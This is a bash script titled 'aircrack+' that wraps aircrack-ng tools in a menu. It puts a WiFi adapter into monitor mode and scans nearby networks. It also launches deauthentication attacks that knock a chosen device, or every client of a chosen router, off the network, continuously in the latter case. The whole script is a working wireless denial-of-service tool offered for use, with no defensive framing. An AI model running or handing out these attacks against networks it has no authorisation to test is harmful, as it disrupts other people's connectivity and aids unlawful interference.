#!/bin/bash

print_menu() {
    echo -e "\e[32mSelect an option:\e[0m"
    echo -e "\e[94m1. \e[36mScan\e[0m"
    echo -e "\e[94m2. Router \e[36mScan\e[0m"
    echo -e "\e[94m3. \e[37mDeAuth \e[94mDevice\e[0m"
    echo -e "\e[94m4. \e[37mDeAuth \e[94mRouter\e[0m"
    echo -e "\e[31m5. Exit\e[0m"
    echo -e "\e[32m             aircrack+ \e[94mby MavaaQ\e[0m"
}

read -p "Enter your WiFi adapter name (e.g., wlp1s0): " adapter

sudo airmon-ng check kill
sudo airmon-ng start $adapter

while true; do
    print_menu
    read -p "Choice: " choice
    case $choice in
        1)  # Total Scan
            sudo airodump-ng ${adapter}mon
            ;;
        2)  # Router Scan
            read -p "Enter channel: " channel
            read -p "Enter router MAC address: " router_mac
            sudo airodump-ng --channel $channel --bssid $router_mac ${adapter}mon
            ;;
        3)  # DeAuth Device
            read -p "Enter router MAC address: " first_mac
            read -p "Enter user MAC address: " second_mac
            sudo aireplay-ng --deauth 9999 -a $first_mac -c $second_mac ${adapter}mon
            ;;
        4)  # DeAuth Router
            read -p "Enter channel: " channel
            read -p "Enter router MAC address: " router_mac
            sudo aireplay-ng --deauth 0 -a $router_mac ${adapter}mon
            ;;
        5)  # Exit
            sudo airmon-ng stop ${adapter}mon
            sudo service NetworkManager restart
            exit 0
            ;;
        *)  # Invalid choice
            echo "Invalid choice."
            ;;
    esac
done

